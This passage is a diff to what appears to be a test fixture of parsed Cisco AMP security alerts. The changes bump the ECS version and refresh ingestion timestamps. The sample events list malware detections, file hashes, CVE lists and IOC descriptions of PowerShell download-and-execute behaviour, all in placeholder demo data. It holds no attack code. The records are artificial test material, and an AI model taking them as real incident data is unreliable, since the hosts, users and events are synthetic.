Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2414,7 +2414,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2434,7 +2434,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-12T17:32:35.701393451Z",
+                "ingested": "2021-09-13T18:06:29.783780334Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}",
                 "kind": "alert",
                 "start": "2021-01-13T10:37:33.000Z",
@@ -2580,7 +2580,7 @@
         {
             "@timestamp": "2021-01-13T10:23:35.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2598,7 +2598,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:32:35.701395327Z",
+                "ingested": "2021-09-13T18:06:29.783782431Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6508159571352093000",
                 "kind": "alert"
@@ -2647,7 +2647,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2667,7 +2667,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701397204Z",
+                "ingested": "2021-09-13T18:06:29.783788750Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-13T10:13:13.000Z",
@@ -2733,7 +2733,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2753,7 +2753,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701399064Z",
+                "ingested": "2021-09-13T18:06:29.783790904Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-13T10:13:08.000Z",
@@ -2812,7 +2812,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2832,7 +2832,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701401029Z",
+                "ingested": "2021-09-13T18:06:29.783793103Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -2890,7 +2890,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2910,7 +2910,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701402957Z",
+                "ingested": "2021-09-13T18:06:29.783795204Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-12T10:24:47.000Z",
@@ -2964,7 +2964,7 @@
         {
             "@timestamp": "2021-01-12T10:15:22.000Z",
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -2982,7 +2982,7 @@
             "event": {
                 "severity": 0,
                 "action": "Policy Update",
-                "ingested": "2021-09-12T17:32:35.701404886Z",
+                "ingested": "2021-09-13T18:06:29.783797267Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
                 "id": "6532910514396201000",
                 "kind": "alert"
@@ -3037,7 +3037,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3069,7 +3069,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701406760Z",
+                "ingested": "2021-09-13T18:06:29.783799355Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3126,7 +3126,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3146,7 +3146,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701408626Z",
+                "ingested": "2021-09-13T18:06:29.783801409Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3210,7 +3210,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3242,7 +3242,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701410523Z",
+                "ingested": "2021-09-13T18:06:29.783803490Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3299,7 +3299,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3319,7 +3319,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701412407Z",
+                "ingested": "2021-09-13T18:06:29.783805582Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3377,7 +3377,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3397,7 +3397,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:32:35.701414261Z",
+                "ingested": "2021-09-13T18:06:29.783807646Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}",
                 "kind": "alert",
                 "start": "2020-12-25T05:30:41.000Z",
@@ -3463,7 +3463,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3483,7 +3483,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:32:35.701416142Z",
+                "ingested": "2021-09-13T18:06:29.783809722Z",
